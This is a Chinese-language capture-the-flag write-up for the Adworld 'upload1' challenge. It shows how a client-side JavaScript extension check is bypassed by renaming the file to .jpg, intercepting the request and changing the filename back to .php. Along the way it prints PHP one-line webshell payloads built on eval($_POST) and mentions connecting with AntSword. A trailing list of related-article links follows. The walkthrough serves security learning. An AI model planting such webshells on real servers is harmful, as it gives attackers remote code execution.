[CTF/网络安全] 攻防世界 upload1 解题详析

[CTF/网络安全] 攻防世界 upload1 解题详析

考察文件上传,具体原理及姿势不再赘述。

姿势

在txt中写入一句话木马<?php @eval($_POST[qiu]);?>

回显如下:

查看源代码:

复制代码
Array.prototype.contains = function (obj) {  
    var i = this.length;  
    while (i--) {  
        if (this[i] === obj) {  
            return true;  
        }  
    }  
    return false;  
}  

function check(){
upfile = document.getElementById("upfile");
submit = document.getElementById("submit");
name = upfile.value;
ext = name.replace(/^.+\./,'');

if(['jpg','png'].contains(ext)){
	submit.disabled = false;
}else{
	submit.disabled = true;

	alert('请选择一张图片文件上传!');
}
 }

这段代码的作用是检查上传文件的扩展名是否符合要求,如果是图片格式(jpg或png),则启用提交按钮,否则禁用提交按钮并弹出提示消息。

其中用到了 JavaScript 中的 Array 原型对象和条件判断语句。该代码通过扩展 Array 原型对象添加了一个名为 contains 的函数,用于判断一个对象是否在数组中,主要应用于判断上传文件的扩展名是否属于指定的图片格式,这里是 ['jpg','png']

更改文件格式为jpg

文件上传成功:

进入所在路径:

上图说明jpg文件被拦截

抓包,修改filename文件后缀为.php,重发请求包


进入所在路径:

无Error回显,说明木马上传成功。
若不清楚木马是否上传成功,可修改内容如下:

复制代码
<?php 
@eval($_POST['qiu']);
echo('qiu');
?>

若文件上传成功,则在上传路径对应的页面会输出qiu

连接蚁剑:

相关推荐
Blurpath7 小时前
免费代理IP服务有哪些隐患?如何安全使用?
网络·安全·ip代理·住宅ip
快消前瞻9 小时前
百度导航广告“焊死”东鹏特饮:商业底线失守,用户安全成隐忧
安全·百度
可怜的Tom被玩弄于股掌之中12 小时前
BUUCTF——ReadlezPHP
安全·web安全·网络安全·网络攻击模型·安全架构
你好我是小美12 小时前
信息收集+初步漏洞打点
安全·web安全·网络安全
weixin_4738947712 小时前
Web安全核心内容与常见漏洞总结
安全·web安全
mooyuan天天13 小时前
upload-labs通关笔记-第10关 文件上传之点多重过滤(空格点绕过)
web安全·代码审计·文件上传·文件上传漏洞·upload-labs靶场
朱包林13 小时前
day10-别名-MD5,aide-堡垒机
linux·运维·安全·ubuntu·centos·云计算
海尔辛15 小时前
学习黑客Kerberos深入浅出:安全王国的门票系统
学习·安全·kerberos·window
Allen_LVyingbo15 小时前
医院网络安全托管服务(MSS)深度解读与实践路径
安全·web安全·健康医疗
20242817李臻15 小时前
李臻20242817_安全文件传输系统项目报告_第12周
数据库·安全